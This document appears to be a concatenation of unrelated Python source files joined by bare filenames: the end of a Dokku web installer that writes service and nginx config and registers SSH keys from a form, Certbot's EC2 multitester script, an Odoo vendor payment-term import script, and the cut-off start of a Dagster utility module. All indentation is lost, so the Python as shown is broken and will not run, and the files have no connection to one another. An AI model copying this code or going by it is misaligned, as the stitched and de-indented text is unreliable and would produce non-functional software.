f.write("[Service]\n")
f.write("ExecStart={0} selfdestruct\n".format(os.path.abspath(__file__)))
f.write("\n")
f.write("[Install]\n")
f.write("WantedBy=multi-user.target\n")
f.write("WantedBy=graphical.target\n")
if os.path.exists(nginx_conf_dir):
with open('{0}/dokku-installer.conf'.format(nginx_conf_dir), 'w') as f:
f.write("upstream dokku-installer { server 127.0.0.1:2000; }\n")
f.write("server {\n")
f.write(" listen 80;\n")
f.write(" location / {\n")
f.write(" proxy_pass http://dokku-installer;\n")
f.write(" }\n")
f.write("}\n")
subprocess.call('rm -f {0}/sites-enabled/*'.format(nginx_dir), shell=True)
sys.exit(0)
class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def write_content(self, content):
try:
self.wfile.write(content)
except TypeError:
self.wfile.write(string_to_bytes(content))
def do_GET(self):
content = PAGE.replace('{VERSION}', VERSION)
content = content.replace('{UFW_DISPLAY}', ufw_display)
content = content.replace('{HOSTNAME}', hostname)
content = content.replace('{AUTHORIZED_KEYS_LOCATION}', key_file)
content = content.replace('{ADMIN_KEYS}', "\n".join(admin_keys))
self.send_response(200)
self.end_headers()
self.write_content(content)
def do_POST(self):
if self.path not in ['/setup', '/setup/']:
return
params = cgi.FieldStorage(fp=self.rfile,
headers=self.headers,
environ={
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type']})
vhost_enable = 'false'
dokku_root = os.getenv('DOKKU_ROOT', '/home/dokku')
if 'vhost' in params and params['vhost'].value == 'true':
vhost_enable = 'true'
with open('{0}/VHOST'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
else:
try:
os.remove('{0}/VHOST'.format(dokku_root))
except OSError:
pass
with open('{0}/HOSTNAME'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
for (index, key) in enumerate(params['keys'].value.splitlines(), 1):
user = 'admin'
if self.admin_user_exists() is not None:
user = 'web-admin'
if self.web_admin_user_exists() is not None:
index = int(self.web_admin_user_exists()) + 1
elif self.web_admin_user_exists() is None:
index = 1
elif self.admin_user_exists() is None:
pass
else:
index = int(self.admin_user_exists()) + 1
user = user + str(index)
command = ['sshcommand', 'acl-add', 'dokku', user]
proc = subprocess.Popen(command, stdin=subprocess.PIPE)
try:
proc.stdin.write(key)
except TypeError:
proc.stdin.write(string_to_bytes(key))
proc.stdin.close()
proc.wait()
set_debconf_selection('boolean', 'nginx_enable', 'true')
set_debconf_selection('boolean', 'skip_key_file', 'true')
set_debconf_selection('boolean', 'vhost_enable', vhost_enable)
set_debconf_selection('boolean', 'web_config', 'false')
set_debconf_selection('string', 'hostname', params['hostname'].value)
if 'selfdestruct' in sys.argv:
DeleteInstallerThread()
content = json.dumps({'status': 'ok'})
self.send_response(200)
self.end_headers()
self.write_content(content)
def web_admin_user_exists(self):
return self.user_exists('web-admin(\d+)')
def admin_user_exists(self):
return self.user_exists('admin(\d+)')
def user_exists(self, name):
command = 'dokku ssh-keys:list'
pattern = re.compile(r'NAME="' + name + '"')
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
max_num = 0
exists = False
for line in proc.stdout:
m = pattern.search(bytes_to_string(line))
if m:
# User of the form `user` or `user#` exists
exists = True
max_num = max(max_num, int(m.group(1)))
if exists:
return max_num
else:
return None
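# Note on GetHandler.user_exists above: given `dokku ssh-keys:list` output containing,
# for instance, lines with NAME="admin1" and NAME="admin3", user_exists('admin(\d+)')
# returns 3; it returns None when no key name matches the pattern.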
def set_debconf_selection(debconf_type, key, value):
found = False
with open('/etc/os-release', 'r') as f:
for line in f:
if 'debian' in line:
found = True
if not found:
return
ps = subprocess.Popen(['echo', 'dokku dokku/{0} {1} {2}'.format(
key, debconf_type, value
)], stdout=subprocess.PIPE)
try:
subprocess.check_output(['debconf-set-selections'], stdin=ps.stdout)
except subprocess.CalledProcessError:
pass
ps.wait()
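# The pipeline above is equivalent to running, with example values:
#   echo 'dokku dokku/hostname string example.com' | debconf-set-selections
# and it is only executed when /etc/os-release identifies a debian-based system.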
class DeleteInstallerThread(object):
def __init__(self, interval=1):
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
command = "rm {0}/conf.d/dokku-installer.conf && {1} stop && {1} start".format(nginx_dir, nginx_init)
try:
subprocess.call(command, shell=True)
except:
pass
command = "rm -f /etc/init/dokku-installer.conf /etc/systemd/system/dokku-installer.service && (stop dokku-installer || systemctl stop dokku-installer.service)"
try:
subprocess.call(command, shell=True)
except:
pass
def main():
check_boot()
port = int(os.getenv('PORT', 2000))
httpd = SocketServer.TCPServer(("", port), GetHandler)
print("Listening on 0.0.0.0:{0}, CTRL+C to stop".format(port))
httpd.serve_forever()
PAGE = """
<html>
<head>
<meta charset="utf-8" />
<title>Dokku Setup</title>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
<style>
.bd-callout {
padding: 1.25rem;
margin-top: 1.25rem;
margin-bottom: 1.25rem;
border: 1px solid #eee;
border-left-width: .25rem;
border-radius: .25rem;
}
.bd-callout p:last-child {
margin-bottom: 0;
}
.bd-callout-info {
border-left-color: #5bc0de;
}
pre {
font-size: 80%;
margin-bottom: 0;
}
h1 small {
font-size: 50%;
}
h5 {
font-size: 1rem;
}
.container {
width: 640px;
}
.result {
padding-left: 20px;
}
input.form-control, textarea.form-control {
background-color: #fafbfc;
font-size: 14px;
}
input.form-control::placeholder, textarea.form-control::placeholder {
color: #adb2b8
}
</style>
</head>
<body>
<div class="container">
<form id="form" role="form">
<h1 class="pt-3">Dokku Setup <small class="text-muted">{VERSION}</small></h1>
<div class="alert alert-warning small" role="alert">
<strong>Warning:</strong> The SSH key filled out here can grant root access to the server. Please complete the setup as soon as possible.
</div>
<div class="row">
<div class="col">
<h3>Admin Access</h3>
<div class="form-group">
<label for="key">Public SSH Keys</label><br />
<textarea class="form-control" name="keys" rows="5" id="key" placeholder="Begins with 'ssh-rsa', 'ssh-dss', 'ssh-ed25519', 'ecdsa-sha2-nistp256', 'ecdsa-sha2-nistp384', or 'ecdsa-sha2-nistp521'">{ADMIN_KEYS}</textarea>
<small class="form-text text-muted">Public keys allow users to ssh onto the server as the <code>dokku</code> user, as well as remotely execute Dokku commands. They are currently auto-populated from: <code>{AUTHORIZED_KEYS_LOCATION}</code>, and can be changed later via the <a href="http://dokku.viewdocs.io/dokku/deployment/user-management/" target="_blank"><code>dokku ssh-keys</code></a> plugin.</small>
</div>
</div>
</div>
<div class="row">
<div class="col">
<h3>Hostname Configuration</h3>
<div class="form-group">
<label for="hostname">Hostname</label>
<input class="form-control" type="text" id="hostname" name="hostname" value="{HOSTNAME}" placeholder="A hostname or ip address such as {HOSTNAME}" />
<small class="form-text text-muted">This will be used as the default host for all applications, and can be changed later via the <a href="http://dokku.viewdocs.io/dokku/configuration/domains/" target="_blank"><code>dokku domains:set-global</code></a> command.</small>
</div>
<div class="form-check">
<input class="form-check-input" type="checkbox" id="vhost" name="vhost" value="true">
<label class="form-check-label" for="vhost">Use virtualhost naming for apps</label>
<small class="form-text text-muted">When enabled, Nginx will be run on port 80 and proxy requests to apps based on hostname.</small>
<small class="form-text text-muted">When disabled, a specific port will be setup for each application on first deploy, and requests to that port will be proxied to the relevant app.</small>
</div>
<div class="alert alert-warning small mt-3 d-{UFW_DISPLAY}" role="alert">
<strong>Warning:</strong> UFW is active. To allow traffic to specific ports, run <code>sudo ufw allow PORT</code> for the port in question.
</div>
<div class="bd-callout bd-callout-info">
<h5>What will app URLs look like?</h5>
<pre><code id="example">http://hostname:port</code></pre>
</div>
</div>
</div>
<button type="button" onclick="setup()" class="btn btn-primary">Finish Setup</button> <span class="result"></span>
</form>
</div>
<div id="error-output"></div>
<script>
var $ = document.querySelector.bind(document)
function setup() {
if ($("#key").value.trim() == "") {
alert("Your admin public key cannot be blank.")
return
}
if ($("#hostname").value.trim() == "") {
alert("Your hostname cannot be blank.")
return
}
var data = new FormData($("#form"))
var inputs = [].slice.call(document.querySelectorAll("input, textarea, button"))
inputs.forEach(function (input) {
input.disabled = true
})
var result = $(".result")
fetch("/setup", {method: "POST", body: data})
.then(function(response) {
if (response.ok) {
return response.json()
} else {
throw new Error('Server returned error')
}
})
.then(function(response) {
result.classList.add("text-success");
result.textContent = "Success! Redirecting in 3 seconds. .."
setTimeout(function() {
window.location.href = "http://dokku.viewdocs.io/dokku~{VERSION}/deployment/application-deployment/";
}, 3000);
})
.catch(function (error) {
result.classList.add("text-danger");
result.textContent = "Could not send the request"
})
}
function update() {
if ($("#vhost").matches(":checked") && $("#hostname").value.match(/^(\d{1,3}\.){3}\d{1,3}$/)) {
alert("In order to use virtualhost naming, the hostname must not be an IP but a valid domain name.")
$("#vhost").checked = false;
}
if ($("#vhost").matches(':checked')) {
$("#example").textContent = "http://<app-name>."+$("#hostname").value
} else {
$("#example").textContent = "http://"+$("#hostname").value+":<app-port>"
}
}
$("#vhost").addEventListener("change", update);
$("#hostname").addEventListener("input", update);
update();
</script>
</body>
</html>
"""
if __name__ == "__main__":
main()
|
multitester.py
|
"""
Certbot Integration Test Tool
- Configures (canned) boulder server
- Launches EC2 instances with a given list of AMIs for different distros
- Copies certbot repo and puts it on the instances
- Runs certbot tests (bash scripts) on all of these
- Logs execution and success/fail for debugging
Notes:
- Some AWS images, e.g. official CentOS and FreeBSD images
require acceptance of user terms on the AWS marketplace
website. This can't be automated.
- AWS EC2 has a default limit of 20 t2/t1 instances, if more
are needed, they need to be requested via online webform.
Usage:
- Requires AWS IAM secrets to be set up with aws cli
- Requires an AWS associated keyfile <keyname>.pem
>aws configure --profile HappyHacker
[interactive: enter secrets for IAM role]
>aws ec2 create-key-pair --profile HappyHacker --key-name MyKeyPair \
--query 'KeyMaterial' --output text > MyKeyPair.pem
then:
>python multitester.py targets.yaml MyKeyPair.pem HappyHacker scripts/test_letsencrypt_auto_venv_only.sh
see:
https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html
https://docs.aws.amazon.com/cli/latest/userguide/cli-ec2-keypairs.html
"""
from __future__ import print_function
from __future__ import with_statement
import sys, os, time, argparse, socket, traceback
import multiprocessing as mp
from multiprocessing import Manager
import urllib2
import yaml
import boto3
from botocore.exceptions import ClientError
import fabric
from fabric.api import run, execute, local, env, sudo, cd, lcd
from fabric.operations import get, put
from fabric.context_managers import shell_env
# Command line parser
#-------------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Builds EC2 cluster for testing.')
parser.add_argument('config_file',
help='yaml configuration file for AWS server cluster')
parser.add_argument('key_file',
help='key file (<keyname>.pem) for AWS')
parser.add_argument('aws_profile',
                    help='profile for AWS (i.e. as in ~/.aws/credentials)')
parser.add_argument('test_script',
default='test_letsencrypt_auto_certonly_standalone.sh',
help='path of bash script in to deploy and run')
#parser.add_argument('--script_args',
# nargs='+',
# help='space-delimited list of arguments to pass to the bash test script',
# required=False)
parser.add_argument('--repo',
default='https://github.com/letsencrypt/letsencrypt.git',
help='certbot git repo to use')
parser.add_argument('--branch',
default='~',
help='certbot git branch to trial')
parser.add_argument('--pull_request',
default='~',
help='letsencrypt/letsencrypt pull request to trial')
parser.add_argument('--merge_master',
action='store_true',
help="if set merges PR into master branch of letsencrypt/letsencrypt")
parser.add_argument('--saveinstances',
action='store_true',
help="don't kill EC2 instances after run, useful for debugging")
parser.add_argument('--alt_pip',
default='',
help="server from which to pull candidate release packages")
parser.add_argument('--killboulder',
action='store_true',
help="do not leave a persistent boulder server running")
parser.add_argument('--boulderonly',
action='store_true',
help="only make a boulder server")
parser.add_argument('--fast',
action='store_true',
help="use larger instance types to run faster (saves about a minute, probably not worth it)")
cl_args = parser.parse_args()
# Credential Variables
#-------------------------------------------------------------------------------
# assumes naming: <key_filename> = <keyname>.pem
KEYFILE = cl_args.key_file
KEYNAME = os.path.split(cl_args.key_file)[1].split('.pem')[0]
PROFILE = None if cl_args.aws_profile == 'SET_BY_ENV' else cl_args.aws_profile
# Globals
#-------------------------------------------------------------------------------
BOULDER_AMI = 'ami-072a9534772bec854' # premade shared boulder AMI 18.04LTS us-east-1
LOGDIR = "letest-%d"%int(time.time()) #points to logging / working directory
SECURITY_GROUP_NAME = 'certbot-security-group'
SENTINEL = None #queue kill signal
SUBNET_NAME = 'certbot-subnet'
class Status(object):
"""Possible statuses of client tests."""
PASS = 'pass'
FAIL = 'fail'
# Boto3/AWS automation functions
#-------------------------------------------------------------------------------
def should_use_subnet(subnet):
"""Should we use the given subnet for these tests?
We should if it is the default subnet for the availability zone or the
subnet is named "certbot-subnet".
"""
if not subnet.map_public_ip_on_launch:
return False
if subnet.default_for_az:
return True
for tag in subnet.tags:
if tag['Key'] == 'Name' and tag['Value'] == SUBNET_NAME:
return True
return False
def make_security_group(vpc):
"""Creates a security group in the given VPC."""
# will fail if security group of GroupName already exists
# cannot have duplicate SGs of the same name
mysg = vpc.create_security_group(GroupName=SECURITY_GROUP_NAME,
Description='security group for automated testing')
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=22, ToPort=22)
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=80, ToPort=80)
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=443, ToPort=443)
# for boulder wfe (http) server
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=4000, ToPort=4000)
# for mosh
mysg.authorize_ingress(IpProtocol="udp", CidrIp="0.0.0.0/0", FromPort=60000, ToPort=61000)
return mysg
def make_instance(ec2_client,
instance_name,
ami_id,
keyname,
security_group_id,
subnet_id,
machine_type='t2.micro',
userdata=""): #userdata contains bash or cloud-init script
block_device_mappings = _get_block_device_mappings(ec2_client, ami_id)
tags = [{'Key': 'Name', 'Value': instance_name}]
tag_spec = [{'ResourceType': 'instance', 'Tags': tags}]
return ec2_client.create_instances(
BlockDeviceMappings=block_device_mappings,
ImageId=ami_id,
SecurityGroupIds=[security_group_id],
SubnetId=subnet_id,
KeyName=keyname,
MinCount=1,
MaxCount=1,
UserData=userdata,
InstanceType=machine_type,
TagSpecifications=tag_spec)[0]
def _get_block_device_mappings(ec2_client, ami_id):
"""Returns the list of block device mappings to ensure cleanup.
This list sets connected EBS volumes to be deleted when the EC2
instance is terminated.
"""
# Not all devices use EBS, but the default value for DeleteOnTermination
# when the device does use EBS is true. See:
# * https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ec2-blockdev-mapping.html
# * https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ec2-blockdev-template.html
return [{'DeviceName': mapping['DeviceName'],
'Ebs': {'DeleteOnTermination': True}}
for mapping in ec2_client.Image(ami_id).block_device_mappings
if not mapping.get('Ebs', {}).get('DeleteOnTermination', True)]
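# For example (hypothetical AMI data): a mapping such as
#   {'DeviceName': '/dev/sda1', 'Ebs': {'DeleteOnTermination': False}}
# is returned here as {'DeviceName': '/dev/sda1', 'Ebs': {'DeleteOnTermination': True}},
# while mappings that already delete on termination, or have no 'Ebs' entry, are omitted.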
# Helper Routines
#-------------------------------------------------------------------------------
def block_until_http_ready(urlstring, wait_time=10, timeout=240):
"Blocks until server at urlstring can respond to http requests"
server_ready = False
t_elapsed = 0
while not server_ready and t_elapsed < timeout:
try:
sys.stdout.write('.')
sys.stdout.flush()
req = urllib2.Request(urlstring)
response = urllib2.urlopen(req)
#if response.code == 200:
server_ready = True
except urllib2.URLError:
pass
time.sleep(wait_time)
t_elapsed += wait_time
def block_until_ssh_open(ipstring, wait_time=10, timeout=120):
"Blocks until server at ipstring has an open port 22"
reached = False
t_elapsed = 0
while not reached and t_elapsed < timeout:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ipstring, 22))
reached = True
except socket.error as err:
time.sleep(wait_time)
t_elapsed += wait_time
sock.close()
def block_until_instance_ready(booting_instance, wait_time=5, extra_wait_time=20):
"Blocks booting_instance until AWS EC2 instance is ready to accept SSH connections"
state = booting_instance.state['Name']
ip = booting_instance.public_ip_address
while state != 'running' or ip is None:
time.sleep(wait_time)
# The instance needs to be reloaded to update its local attributes. See
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Instance.reload.
booting_instance.reload()
state = booting_instance.state['Name']
ip = booting_instance.public_ip_address
block_until_ssh_open(ip)
time.sleep(extra_wait_time)
return booting_instance
# Fabric Routines
#-------------------------------------------------------------------------------
def local_git_clone(repo_url):
"clones master of repo_url"
with lcd(LOGDIR):
local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
local('git clone %s letsencrypt'% repo_url)
local('tar czf le.tar.gz letsencrypt')
def local_git_branch(repo_url, branch_name):
"clones branch <branch_name> of repo_url"
with lcd(LOGDIR):
local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
local('git clone %s letsencrypt --branch %s --single-branch'%(repo_url, branch_name))
local('tar czf le.tar.gz letsencrypt')
def local_git_PR(repo_url, PRnumstr, merge_master=True):
"clones specified pull request from repo_url and optionally merges into master"
with lcd(LOGDIR):
local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
local('git clone %s letsencrypt'% repo_url)
local('cd letsencrypt && git fetch origin pull/%s/head:lePRtest'%PRnumstr)
local('cd letsencrypt && git checkout lePRtest')
if merge_master:
local('cd letsencrypt && git remote update origin')
local('cd letsencrypt && git merge origin/master -m "testmerge"')
local('tar czf le.tar.gz letsencrypt')
def local_repo_to_remote():
"copies local tarball of repo to remote"
with lcd(LOGDIR):
put(local_path='le.tar.gz', remote_path='')
run('tar xzf le.tar.gz')
def local_repo_clean():
"delete tarball"
with lcd(LOGDIR):
local('rm le.tar.gz')
def deploy_script(scriptpath, *args):
"copies to remote and executes local script"
#with lcd('scripts'):
put(local_path=scriptpath, remote_path='', mirror_local_mode=True)
scriptfile = os.path.split(scriptpath)[1]
args_str = ' '.join(args)
run('./'+scriptfile+' '+args_str)
def run_boulder():
with cd('$GOPATH/src/github.com/letsencrypt/boulder'):
run('sudo docker-compose up -d')
def config_and_launch_boulder(instance):
execute(deploy_script, 'scripts/boulder_config.sh')
execute(run_boulder)
def install_and_launch_certbot(instance, boulder_url, target):
execute(local_repo_to_remote)
with shell_env(BOULDER_URL=boulder_url,
PUBLIC_IP=instance.public_ip_address,
PRIVATE_IP=instance.private_ip_address,
PUBLIC_HOSTNAME=instance.public_dns_name,
PIP_EXTRA_INDEX_URL=cl_args.alt_pip,
OS_TYPE=target['type']):
execute(deploy_script, cl_args.test_script)
def grab_certbot_log():
"grabs letsencrypt.log via cat into logged stdout"
sudo('if [ -f /var/log/letsencrypt/letsencrypt.log ]; then \
cat /var/log/letsencrypt/letsencrypt.log; else echo "[novarlog]"; fi')
    # fall back to a local certbot.log in case /var/log is unwritable
sudo('if [ -f ./certbot.log ]; then \
cat ./certbot.log; else echo "[nolocallog]"; fi')
def create_client_instance(ec2_client, target, security_group_id, subnet_id):
"""Create a single client instance for running tests."""
if target['virt'] == 'hvm':
machine_type = 't2.medium' if cl_args.fast else 't2.micro'
else:
# 32 bit systems
machine_type = 'c1.medium' if cl_args.fast else 't1.micro'
if 'userdata' in target.keys():
userdata = target['userdata']
else:
userdata = ''
name = 'le-%s'%target['name']
print(name, end=" ")
return make_instance(ec2_client,
name,
target['ami'],
KEYNAME,
machine_type=machine_type,
security_group_id=security_group_id,
subnet_id=subnet_id,
userdata=userdata)
def test_client_process(inqueue, outqueue, boulder_url):
cur_proc = mp.current_process()
for inreq in iter(inqueue.get, SENTINEL):
ii, instance_id, target = inreq
# Each client process is given its own session due to the suggestion at
# https://boto3.amazonaws.com/v1/documentation/api/latest/guide/resources.html?highlight=multithreading#multithreading-multiprocessing.
aws_session = boto3.session.Session(profile_name=PROFILE)
ec2_client = aws_session.resource('ec2')
instance = ec2_client.Instance(id=instance_id)
#save all stdout to log file
sys.stdout = open(LOGDIR+'/'+'%d_%s.log'%(ii,target['name']), 'w')
print("[%s : client %d %s %s]" % (cur_proc.name, ii, target['ami'], target['name']))
instance = block_until_instance_ready(instance)
print("server %s at %s"%(instance, instance.public_ip_address))
env.host_string = "%s@%s"%(target['user'], instance.public_ip_address)
print(env.host_string)
try:
install_and_launch_certbot(instance, boulder_url, target)
outqueue.put((ii, target, Status.PASS))
print("%s - %s SUCCESS"%(target['ami'], target['name']))
except:
outqueue.put((ii, target, Status.FAIL))
print("%s - %s FAIL"%(target['ami'], target['name']))
traceback.print_exc(file=sys.stdout)
pass
# append server certbot.log to each per-machine output log
print("\n\ncertbot.log\n" + "-"*80 + "\n")
try:
execute(grab_certbot_log)
except:
print("log fail\n")
traceback.print_exc(file=sys.stdout)
pass
def cleanup(cl_args, instances, targetlist):
print('Logs in ', LOGDIR)
# If lengths of instances and targetlist aren't equal, instances failed to
# start before running tests so leaving instances running for debugging
# isn't very useful. Let's cleanup after ourselves instead.
if len(instances) == len(targetlist) or not cl_args.saveinstances:
print('Terminating EC2 Instances')
if cl_args.killboulder:
boulder_server.terminate()
for instance in instances:
instance.terminate()
else:
# print login information for the boxes for debugging
for ii, target in enumerate(targetlist):
print(target['name'],
target['ami'],
"%s@%s"%(target['user'], instances[ii].public_ip_address))
def main():
# Fabric library controlled through global env parameters
env.key_filename = KEYFILE
env.shell = '/bin/bash -l -i -c'
env.connection_attempts = 5
env.timeout = 10
# replace default SystemExit thrown by fabric during trouble
class FabricException(Exception):
pass
env['abort_exception'] = FabricException
# Set up local copy of git repo
#-------------------------------------------------------------------------------
print("Making local dir for test repo and logs: %s"%LOGDIR)
local('mkdir %s'%LOGDIR)
# figure out what git object to test and locally create it in LOGDIR
print("Making local git repo")
try:
if cl_args.pull_request != '~':
print('Testing PR %s '%cl_args.pull_request,
"MERGING into master" if cl_args.merge_master else "")
execute(local_git_PR, cl_args.repo, cl_args.pull_request, cl_args.merge_master)
elif cl_args.branch != '~':
print('Testing branch %s of %s'%(cl_args.branch, cl_args.repo))
execute(local_git_branch, cl_args.repo, cl_args.branch)
else:
print('Testing master of %s'%cl_args.repo)
execute(local_git_clone, cl_args.repo)
except FabricException:
print("FAIL: trouble with git repo")
traceback.print_exc()
exit()
# Set up EC2 instances
#-------------------------------------------------------------------------------
configdata = yaml.safe_load(open(cl_args.config_file, 'r'))
targetlist = configdata['targets']
print('Testing against these images: [%d total]'%len(targetlist))
for target in targetlist:
print(target['ami'], target['name'])
print("Connecting to EC2 using\n profile %s\n keyname %s\n keyfile %s"%(PROFILE, KEYNAME, KEYFILE))
aws_session = boto3.session.Session(profile_name=PROFILE)
ec2_client = aws_session.resource('ec2')
print("Determining Subnet")
for subnet in ec2_client.subnets.all():
if should_use_subnet(subnet):
subnet_id = subnet.id
vpc_id = subnet.vpc.id
break
else:
print("No usable subnet exists!")
print("Please create a VPC with a subnet named {0}".format(SUBNET_NAME))
print("that maps public IPv4 addresses to instances launched in the subnet.")
sys.exit(1)
print("Making Security Group")
vpc = ec2_client.Vpc(vpc_id)
sg_exists = False
for sg in vpc.security_groups.all():
if sg.group_name == SECURITY_GROUP_NAME:
security_group_id = sg.id
sg_exists = True
print(" %s already exists"%SECURITY_GROUP_NAME)
if not sg_exists:
security_group_id = make_security_group(vpc).id
time.sleep(30)
boulder_preexists = False
boulder_servers = ec2_client.instances.filter(Filters=[
{'Name': 'tag:Name', 'Values': ['le-boulderserver']},
{'Name': 'instance-state-name', 'Values': ['running']}])
boulder_server = next(iter(boulder_servers), None)
print("Requesting Instances...")
if boulder_server:
print("Found existing boulder server:", boulder_server)
boulder_preexists = True
else:
print("Can't find a boulder server, starting one...")
boulder_server = make_instance(ec2_client,
'le-boulderserver',
BOULDER_AMI,
KEYNAME,
machine_type='t2.micro',
#machine_type='t2.medium',
security_group_id=security_group_id,
subnet_id=subnet_id)
instances = []
try:
if not cl_args.boulderonly:
print("Creating instances: ", end="")
for target in targetlist:
instances.append(
create_client_instance(ec2_client, target,
security_group_id, subnet_id)
)
print()
# Configure and launch boulder server
#-------------------------------------------------------------------------------
print("Waiting on Boulder Server")
boulder_server = block_until_instance_ready(boulder_server)
print(" server %s"%boulder_server)
# env.host_string defines the ssh user and host for connection
env.host_string = "ubuntu@%s"%boulder_server.public_ip_address
print("Boulder Server at (SSH):", env.host_string)
if not boulder_preexists:
print("Configuring and Launching Boulder")
config_and_launch_boulder(boulder_server)
# blocking often unnecessary, but cheap EC2 VMs can get very slow
block_until_http_ready('http://%s:4000'%boulder_server.public_ip_address,
wait_time=10, timeout=500)
boulder_url = "http://%s:4000/directory"%boulder_server.private_ip_address
print("Boulder Server at (public ip): http://%s:4000/directory"%boulder_server.public_ip_address)
print("Boulder Server at (EC2 private ip): %s"%boulder_url)
if cl_args.boulderonly:
sys.exit(0)
# Install and launch client scripts in parallel
#-------------------------------------------------------------------------------
print("Uploading and running test script in parallel: %s"%cl_args.test_script)
print("Output routed to log files in %s"%LOGDIR)
# (Advice: always use Manager.Queue, never regular multiprocessing.Queue;
# the latter has implementation flaws that deadlock it in some circumstances)
manager = Manager()
outqueue = manager.Queue()
inqueue = manager.Queue()
# launch as many processes as clients to test
num_processes = len(targetlist)
jobs = [] #keep a reference to current procs
# initiate process execution
for i in range(num_processes):
p = mp.Process(target=test_client_process, args=(inqueue, outqueue, boulder_url))
jobs.append(p)
p.daemon = True # kills subprocesses if parent is killed
p.start()
# fill up work queue
for ii, target in enumerate(targetlist):
inqueue.put((ii, instances[ii].id, target))
# add SENTINELs to end client processes
for i in range(num_processes):
inqueue.put(SENTINEL)
print('Waiting on client processes', end='')
for p in jobs:
while p.is_alive():
p.join(5 * 60)
# Regularly print output to keep Travis happy
print('.', end='')
sys.stdout.flush()
print()
# add SENTINEL to output queue
outqueue.put(SENTINEL)
# clean up
execute(local_repo_clean)
# print and save summary results
results_file = open(LOGDIR+'/results', 'w')
outputs = [outq for outq in iter(outqueue.get, SENTINEL)]
outputs.sort(key=lambda x: x[0])
failed = False
for outq in outputs:
ii, target, status = outq
if status == Status.FAIL:
failed = True
print('%d %s %s'%(ii, target['name'], status))
results_file.write('%d %s %s\n'%(ii, target['name'], status))
if len(outputs) != num_processes:
failed = True
failure_message = 'FAILURE: Some target machines failed to run and were not tested. ' +\
'Tests should be rerun.'
print(failure_message)
results_file.write(failure_message + '\n')
results_file.close()
if failed:
sys.exit(1)
finally:
cleanup(cl_args, instances, targetlist)
# kill any connections
fabric.network.disconnect_all()
if __name__ == '__main__':
main()
|
25_vendor_terms.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import csv
from xmlrpc import client as xmlrpclib
import multiprocessing as mp
from scriptconfig import URL, DB, UID, PSW, WORKERS
def update_vendor_terms(pid, data_pool, write_ids, error_ids):
sock = xmlrpclib.ServerProxy(URL, allow_none=True)
while data_pool:
try:
data = data_pool.pop()
code = data.get('TERM-CODE')
vals = {'name': data.get('TERM-DESC'),
'note': data.get('TERM-DESC'),
'active': True,
'order_type': 'purchase',
'code': code,
'discount_per': data.get('TERM-DISC-PCT', 0),
'due_days': data.get('TERM-DISC-DAYS', 0),
}
res = write_ids.get(code, [])
if res:
sock.execute(DB, UID, PSW, 'account.payment.term', 'write', res, vals)
print(pid, 'UPDATE - VENDOR TERM', res)
else:
vals['line_ids'] = [(0, 0, {'type': 'balance', 'days': int(data.get('TERM-DAYS-DUE', 0) or 0)})]
res = sock.execute(DB, UID, PSW, 'account.payment.term', 'create', vals)
print(pid, 'CREATE - VENDOR TERM', res)
if not data_pool:
break
except:
break
def sync_terms():
manager = mp.Manager()
data_pool = manager.list()
error_ids = manager.list()
write_ids = manager.dict()
process_Q = []
fp = open('files/aplterm1.csv', 'r')
csv_reader = csv.DictReader(fp)
for vals in csv_reader:
data_pool.append(vals)
fp.close()
domain = [('order_type', '=', 'purchase')]
sock = xmlrpclib.ServerProxy(URL, allow_none=True)
res = sock.execute(DB, UID, PSW, 'account.payment.term', 'search_read', domain, ['id', 'code'])
write_ids = {term['code']: term['id'] for term in res}
res = None
term_codes = None
for i in range(WORKERS):
pid = "Worker-%d" % (i + 1)
worker = mp.Process(name=pid, target=update_vendor_terms, args=(pid, data_pool, write_ids, error_ids))
process_Q.append(worker)
worker.start()
for worker in process_Q:
worker.join()
if __name__ == "__main__":
# PARTNER
sync_terms()
|
__init__.py
|
import contextlib
import datetime
import errno
import inspect
import multiprocessing
import os
import re
import signal
import subprocess
import sys
import tempfile
import threading
from collections import namedtuple
from enum import Enum
from warnings import warn
import six
import yaml
from six.moves import configparser
from dagster import check
from dagster.core.errors import DagsterInvariantViolationError
from dagster.seven import IS_WINDOWS, thread
from dagster.seven.abc import Mapping
from dagster.utils.merger import merge_dicts
from .yaml_utils import load_yaml_from_glob_list, load_yaml_from_globs, load_yaml_from_path
if sys.version_info > (3,):
from pathlib import Path # pylint: disable=import-error
else:
from pathlib2 import Path # pylint: disable=import-error
EPOCH = datetime.datetime.utcfromtimestamp(0)
# 2/3 compatibility
PICKLE_PROTOCOL = 2
DEFAULT_REPOSITORY_YAML_FILENAME = 'repository.yaml'
def file_relative_path(dunderfile, relative_path):
'''
This function is useful when one needs to load a file that is
relative to the position of the current file (such as when you
encode a configuration file path in a source file and want it to
work regardless of the current working directory).
It is meant to be used like the following:
file_relative_path(__file__, 'path/relative/to/file')
'''
check.str_param(dunderfile, 'dunderfile')
check.str_param(relative_path, 'relative_path')
return os.path.join(os.path.dirname(dunderfile), relative_path)
def script_relative_path(file_path):
'''
Useful for testing with local files. Use a path relative to where the
test resides and this function will return the absolute path
of that file. Otherwise it will be relative to the script that
ran the test.
